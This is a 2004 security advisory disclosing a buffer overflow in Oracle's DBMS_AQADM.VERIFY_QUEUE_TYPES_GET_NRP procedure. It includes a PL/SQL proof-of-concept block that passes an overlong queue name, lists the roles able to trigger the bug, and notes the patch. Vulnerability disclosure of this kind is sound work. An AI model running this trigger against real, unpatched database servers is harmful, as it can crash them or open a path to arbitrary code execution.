|
#28 - Buffer overflow in procedure VERIFY_QUEUE_TYPES_GET_NRP of DBMS_AQADM package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Medium
Details:
When VERIFY_QUEUE_TYPES_GET_NRP procedure is called with a long string in the SRC_QUEUE_NAME parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_SRC_QUEUE_NAME VARCHAR2(32767);
P_DEST_QUEUE_NAME VARCHAR2(32767);
P_DESTINATION VARCHAR2(32767);
P_RC BINARY_INTEGER;
P_TRANSFORMATION VARCHAR2(32767);
BEGIN
P_SRC_QUEUE_NAME := 'longstring';
P_DEST_QUEUE_NAME := '';
P_DESTINATION := '';
P_TRANSFORMATION := '';
SYS.DBMS_AQADM.VERIFY_QUEUE_TYPES_GET_NRP(SRC_QUEUE_NAME => P_SRC_QUEUE_NAME, DEST_QUEUE_NAME => P_DEST_QUEUE_NAME, DESTINATION =>
P_DESTINATION, RC => P_RC, TRANSFORMATION => P_TRANSFORMATION);
END;
Analysis:
This vulnerability can be exploited by members of any of the following roles EXECUTE_CATALOG_ROLE, IMP_FULL_DATABASE, IMP_FULL_DATABASE, QS_ADM, QS, QS_WS, QS_ES, QS_OS, QS_CBADM, QS_CB, QS_CS, SYSDBA roles and users granted execute permissions on DBMS_AQADM package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g Not vulnerable.
|
